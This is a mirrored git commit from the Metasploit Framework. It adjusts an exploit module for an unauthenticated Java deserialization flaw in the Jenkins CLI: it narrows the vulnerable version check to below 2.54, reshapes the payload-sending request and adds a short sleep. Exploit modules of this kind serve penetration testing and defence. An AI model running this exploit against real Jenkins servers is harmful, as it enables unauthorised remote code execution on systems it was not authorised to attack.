mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
change version check and add sleep
This commit is contained in:
parent
e5c9439974
commit
d86f9427c9
@ -1,7 +1,7 @@
|
||||
## Vulnerable Application
|
||||
|
||||
An unauthenticated Java object deserialization vulnerability exists
|
||||
in the CLI component for Jenkins versions `v2.56` and below.
|
||||
in the CLI component for Jenkins versions below `v2.54`.
|
||||
|
||||
The `readFrom` method within the `Command` class in the Jenkins
|
||||
CLI remoting component deserializes objects received from clients without
|
||||
|
@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
return Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version
|
||||
|
||||
vers_no = Gem::Version.new(version)
|
||||
return Exploit::CheckCode::Appears("Jenkins version #{version} detected") if vers_no <= Gem::Version.new('2.56')
|
||||
return Exploit::CheckCode::Appears("Jenkins version #{version} detected") if vers_no < Gem::Version.new('2.54')
|
||||
|
||||
Exploit::CheckCode::Detected
|
||||
end
|
||||
@ -120,7 +120,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
) # don't wait for response, and don't disconnect
|
||||
|
||||
cmd = build_obj(cmd)
|
||||
|
||||
send_request_cgi(
|
||||
{
|
||||
'uri' => sess_uri,
|
||||
@ -131,8 +130,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Side' => 'upload',
|
||||
'Session' => sess_uuid
|
||||
}
|
||||
}, nil
|
||||
}
|
||||
)
|
||||
sleep(2)
|
||||
end
|
||||
|
||||
def build_obj(obj_data)
|
||||
|
Loading…
Reference in New Issue
Block a user